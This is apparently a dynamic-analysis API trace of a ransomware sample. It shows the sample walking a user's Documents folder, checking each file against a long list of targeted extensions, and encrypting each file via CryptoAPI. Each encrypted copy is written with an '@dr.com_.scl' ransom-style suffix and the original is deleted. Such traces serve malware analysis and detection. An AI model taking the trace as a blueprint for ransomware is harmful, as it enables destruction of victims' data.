	[0186.015] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0xc9fe, dwBufLen=0xc9fe | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0xca00) returned 1
	[0186.016] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.016] RtlMoveMemory (in: Destination=0xfe9b88, Source=0xfdd180, Length=0xc9fe | out: Destination=0xfe9b88) 
	[0186.017] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.017] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe9b88*, pdwDataLen=0x18bc0c*=0xc9fe, dwBufLen=0xca00 | out: pbData=0xfe9b88*, pdwDataLen=0x18bc0c*=0xca00) returned 1
	[0186.019] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.019] CryptDestroyKey (hKey=0xfb98f0) returned 1
	[0186.019] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.019] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0186.019] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.020] CryptReleaseContext (hProv=0xfcac48, dwFlags=0x0) returned 1
	[0186.020] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.020] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0186.020] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.021] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0186.022] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\ijljdu.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 85
	[0186.022] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\ijljdu.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ijljdu.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0186.023] WriteFile (in: hFile=0x2c0, lpBuffer=0xfe9b88*, nNumberOfBytesToWrite=0xca00, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe9b88*, lpNumberOfBytesWritten=0x18c068*=0xca00, lpOverlapped=0x0) returned 1
	[0186.028] CloseHandle (hObject=0x2c0) returned 1
	[0186.028] CloseHandle (hObject=0x384) returned 1
	[0186.028] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\ijljdu.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ijljdu.pptx")) returned 1
	[0186.037] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\ijljdu.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ijljdu.pptx")) returned 0
	[0186.037] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcaad8700, ftCreationTime.dwHighDateTime=0x1d968cb, ftLastAccessTime.dwLowDateTime=0xcbc93e60, ftLastAccessTime.dwHighDateTime=0x1d96ac7, ftLastWriteTime.dwLowDateTime=0xcbc93e60, ftLastWriteTime.dwHighDateTime=0x1d96ac7, nFileSizeHigh=0x0, nFileSizeLow=0x6f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="K0Sx.docx", cAlternateFileName="K0SX~1.DOC")) returned 1
	[0186.037] lstrcmpW (lpString1="K0Sx.docx", lpString2="..") returned 1
	[0186.037] lstrcmpW (lpString1="K0Sx.docx", lpString2=".") returned 1
	[0186.037] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0186.037] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="K0Sx.docx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\K0Sx.docx") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\K0Sx.docx"
	[0186.037] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\K0Sx.docx") returned 41
	[0186.038] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0186.038] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\K0Sx.docx", cchLength=0x29 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\k0sx.docx") returned 0x29
	[0186.038] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.038] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\k0sx.docx", lpSrch="help_decrypt_your_files") returned 0x0
	[0186.038] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\k0sx.docx" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\k0sx.docx") returned="c:\\users\\rdhj0cnfevzx\\documents\\k0sx.docx"
	[0186.038] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\k0sx.docx") returned 41
	[0186.038] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.039] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.039] StrStrW (lpFirst=".docx", lpSrch=".") returned=".docx"
	[0186.039] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.039] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".docx") returned=".docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0186.039] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0186.040] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0186.040] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\k0sx.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\k0sx.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0186.040] ReadFile (in: hFile=0x384, lpBuffer=0xfc51f8, nNumberOfBytesToRead=0x6f1, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfc51f8*, lpNumberOfBytesRead=0x18c060*=0x6f1, lpOverlapped=0x0) returned 1
	[0186.044] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.044] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb5d8) returned 1
	[0186.046] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.046] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0186.046] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.046] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0186.046] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.047] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0186.047] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.047] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x6f1, dwBufLen=0x6f1 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x700) returned 1
	[0186.047] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.047] RtlMoveMemory (in: Destination=0xfc1b58, Source=0xfc51f8, Length=0x6f1 | out: Destination=0xfc1b58) 
	[0186.047] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.047] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc1b58*, pdwDataLen=0x18bc0c*=0x6f1, dwBufLen=0x700 | out: pbData=0xfc1b58*, pdwDataLen=0x18bc0c*=0x700) returned 1
	[0186.048] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.048] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0186.048] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.048] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0186.048] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.048] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0186.048] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.049] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0186.049] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.049] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0186.050] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\k0sx.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 83
	[0186.050] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\k0sx.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\k0sx.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0186.051] WriteFile (in: hFile=0x2c0, lpBuffer=0xfc1b58*, nNumberOfBytesToWrite=0x700, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfc1b58*, lpNumberOfBytesWritten=0x18c068*=0x700, lpOverlapped=0x0) returned 1
	[0186.054] CloseHandle (hObject=0x2c0) returned 1
	[0186.054] CloseHandle (hObject=0x384) returned 1
	[0186.054] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\k0sx.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\k0sx.docx")) returned 1
	[0186.057] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\k0sx.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\k0sx.docx")) returned 0
	[0186.057] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2d53740, ftCreationTime.dwHighDateTime=0x1d90313, ftLastAccessTime.dwLowDateTime=0xa0a8e320, ftLastAccessTime.dwHighDateTime=0x1d9603b, ftLastWriteTime.dwLowDateTime=0xa0a8e320, ftLastWriteTime.dwHighDateTime=0x1d9603b, nFileSizeHigh=0x0, nFileSizeLow=0x5570, dwReserved0=0x0, dwReserved1=0x0, cFileName="la6 2fm2Gbg9O.xlsx", cAlternateFileName="LA62FM~1.XLS")) returned 1
	[0186.058] lstrcmpW (lpString1="la6 2fm2Gbg9O.xlsx", lpString2="..") returned 1
	[0186.058] lstrcmpW (lpString1="la6 2fm2Gbg9O.xlsx", lpString2=".") returned 1
	[0186.058] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0186.058] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="la6 2fm2Gbg9O.xlsx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\la6 2fm2Gbg9O.xlsx") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\la6 2fm2Gbg9O.xlsx"
	[0186.058] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\la6 2fm2Gbg9O.xlsx") returned 50
	[0186.058] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0186.058] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\la6 2fm2Gbg9O.xlsx", cchLength=0x32 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\la6 2fm2gbg9o.xlsx") returned 0x32
	[0186.058] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.059] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\la6 2fm2gbg9o.xlsx", lpSrch="help_decrypt_your_files") returned 0x0
	[0186.059] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\la6 2fm2gbg9o.xlsx" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\la6 2fm2gbg9o.xlsx") returned="c:\\users\\rdhj0cnfevzx\\documents\\la6 2fm2gbg9o.xlsx"
	[0186.059] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\la6 2fm2gbg9o.xlsx") returned 50
	[0186.059] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.059] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.059] StrStrW (lpFirst=".xlsx", lpSrch=".") returned=".xlsx"
	[0186.060] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
